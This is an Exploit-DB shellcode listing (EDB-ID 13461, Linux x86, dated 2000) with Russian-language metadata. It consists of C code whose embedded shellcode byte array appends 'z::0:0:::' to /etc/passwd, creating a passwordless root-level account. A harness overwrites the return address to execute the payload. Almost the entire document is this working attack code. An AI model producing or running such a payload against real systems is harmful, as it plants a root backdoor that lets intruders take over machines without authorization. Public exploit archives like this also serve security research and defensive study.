- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13461
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2000-08-07
C:
/*
* Linux/x86
*
* Appends the line "z::0:0:::\n" to /etc/passwd.
* (quite old, could be optimized further)
*/
#include <stdio.h>
char c0de[] =
/* main: */
"\xeb\x29" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x0b" /* movb %al, 0x0b(%esi) */
"\x89\xf3" /* movl %esi, %ebx */
"\x66\xb9\x01\x04" /* movw $0x401, %cx */
"\x66\xba\xb6\x01" /* movw $0x1b6, %dx */
"\xb0\x05" /* movb $0x05, %al */
"\xcd\x80" /* int $0x80 */
"\x93" /* xchgl %eax, %ebx */
"\x29\xc0" /* subl %eax, %eax */
"\x29\xd2" /* subl %edx, %edx */
"\xb0\x04" /* movb $0x04, %al */
"\x89\xf1" /* movl %esi, %ecx */
"\x80\xc1\x0c" /* addb $0x0c, %cl */
"\xb2\x0a" /* movb $0x0a, %dl */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xd2\xff\xff\xff" /* call start */
/* DATA */
"/etc/passwd"
"\xff"
"z::0:0:::\n";
main() {
int *ret;
ret=(int *)&ret +2;
printf("Shellcode lenght=%d\n",strlen(c0de));
(*ret) = (int)c0de;
}
// milw0rm.com [2000-08-07]- Источник
- www.exploit-db.com
